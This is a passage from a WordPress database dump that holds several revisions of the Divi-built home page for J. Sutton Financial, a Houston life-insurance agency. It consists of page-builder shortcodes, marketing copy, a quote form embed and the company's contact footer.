_module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:04:36','2023-04-08 21:04:36','',138,'http://cmdev-site1.com/?p=853',0,'revision','',0),(855,1,'2023-04-08 21:08:51','2023-04-08 21:08:51','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" column_structure=\"1_2,1_2\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][et_pb_button button_text=\"Learn More\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_bg_enable_color=\"on\" button_border_width=\"0px\" button_border_radius=\"14px\" hover_enabled=\"0\" sticky_enabled=\"0\" button_url=\"/products-services/\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][et_pb_button button_text=\"Work for Us\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_bg_enable_color=\"on\" button_border_width=\"0px\" button_border_radius=\"14px\" hover_enabled=\"0\" sticky_enabled=\"0\" button_url=\"/careers/\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:08:51','2023-04-08 21:08:51','',138,'http://cmdev-site1.com/?p=855',0,'revision','',0),(856,1,'2023-04-08 21:11:14','2023-04-08 21:11:14','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" column_structure=\"1_2,1_2\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][et_pb_button button_text=\"Learn More\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_bg_enable_color=\"on\" button_border_width=\"0px\" button_border_radius=\"14px\" hover_enabled=\"0\" sticky_enabled=\"0\" button_url=\"/products-services/\" button_alignment=\"center\" custom_margin_last_edited=\"on|phone\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||150px|false|false\"][/et_pb_button][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][et_pb_button button_text=\"Work for Us\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_bg_enable_color=\"on\" button_border_width=\"0px\" button_border_radius=\"14px\" hover_enabled=\"0\" sticky_enabled=\"0\" button_url=\"/careers/\" button_alignment=\"center\" custom_margin_last_edited=\"on|desktop\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|150px|||false|false\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" 